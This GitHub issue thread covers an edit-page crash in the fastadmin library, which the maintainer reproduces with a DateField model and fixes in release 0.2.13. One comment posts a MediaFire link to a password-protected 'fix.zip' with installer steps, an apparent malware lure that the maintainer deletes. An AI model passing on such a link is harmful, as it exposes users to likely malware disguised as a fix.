### ISSUE TITLE
Problem on edit

### ISSUE THREAD

**Issue by mosynaq** [vsdudakov/fastadmin#65]
When I try to **edit** an item a white page appears and I get the following error in the browser console.
![image](https://github.com/user-attachments/assets/991b8d39-66d3-4761-b8e6-e1308adf5bc9)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mosynaq** [comment]
@seeronline, may you explain what the file is?

**Comment by vsdudakov** [comment]
Deleted a comment with file

**Comment by mosynaq** [comment]
ORM: tortoise-orm v0.21.6
Framework: FastAPI v0.112.1

```python
class Image(Model):
    id = fields.IntField(primary_key=True)
    name = fields.CharField(max_length=500, unique=True)
    image_url = fields.CharField(max_length=500)

@register(CeremonyImage)
class ImageAdmin(TortoiseModelAdmin):
    list_display = ("id", "name", "image_url")
    list_display_links = ("id", "name", "image_url")
    list_filter = ("id", "name", "image_url")
    search_fields = ("id", "name", "image_url")
```

**Comment by mosynaq** [comment]
Does my code have any problems?

**Comment by vsdudakov** [comment]
<img width="1507" alt="image" src="https://github.com/user-attachments/assets/c59a45bc-da6a-4de8-bda9-4bf874aeac7f">
 It works for me with your model and admin
 I used example fastapi_tortoiseorm (added your model with admin)
 
 tortoise orm 0.21.6
 FastAPI 0.112.1

**Comment by mosynaq** [comment]
Sorry, but in order to keep the models simple I dropped `date` field from the sample of the first post. With a field of type `DateField`,  you can reproduce the bug.
```python
class Image(Model):
    id = fields.IntField(primary_key=True)
    name = fields.CharField(max_length=500, unique=True)
    image_url = fields.CharField(max_length=500)
    date = fields.DateField()

@register(Image)
class ImageAdmin(TortoiseModelAdmin):
    list_display = ("id", "name", "image_url", "date")
    list_display_links = ("id", "name", "image_url", "date")
    list_filter = ("id", "name", "image_url", "date")
    search_fields = ("id", "name", "image_url", "date")
```

**Comment by vsdudakov** [comment]
Reproduced I will provide a fix soon

**Comment by vsdudakov** [comment]
@mosynaq fixed here https://github.com/vsdudakov/fastadmin/releases/tag/0.2.13
